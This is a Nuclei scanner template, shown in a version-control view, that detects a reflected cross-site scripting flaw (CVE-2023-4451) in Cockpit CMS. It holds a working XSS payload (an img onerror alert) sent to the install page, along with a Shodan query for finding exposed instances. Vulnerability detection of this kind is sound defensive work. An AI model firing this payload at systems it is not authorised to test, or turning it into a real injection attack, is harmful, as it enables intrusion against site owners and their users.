nuclei-templates/http/cves/2023/CVE-2023-4451.yaml

44 lines
1.1 KiB
YAML
Raw Normal View History

2023-10-11 15:11:07 +00:00
id: CVE-2023-4451
info:
name: Cockpit - Cross-Site Scripting
author: iamnoooob,pdresearch
severity: medium
description: |
Cross-site Scripting (XSS) - Reflected in GitHub repository cockpit-hq/cockpit prior to 2.6.4.
reference:
- https://huntr.dev/bounties/4e111c3e-6cf3-4b4c-b3c1-a540bf30f8fa/
- https://github.com/Cockpit-HQ/Cockpit/commit/30609466c817e39f9de1871559603e93cd4d0d0c
2023-10-11 20:31:05 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-4451
classification:
cve-id: CVE-2023-4451
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
2023-10-11 15:11:07 +00:00
metadata:
max-request: 1
verified: true
shodan-query: html:"Cockpit"
tags: cve,cve2023,cockpit,xss
http:
- method: GET
path:
- "{{BaseURL}}/install/index.php?1692443074&space=%3Cimg%20src=1%20onerror=alert(document.domain)%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
2023-10-11 20:31:05 +00:00
- "Space :<img src=1 onerror=alert(document.domain)>: does not exist"
2023-10-11 15:11:07 +00:00
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200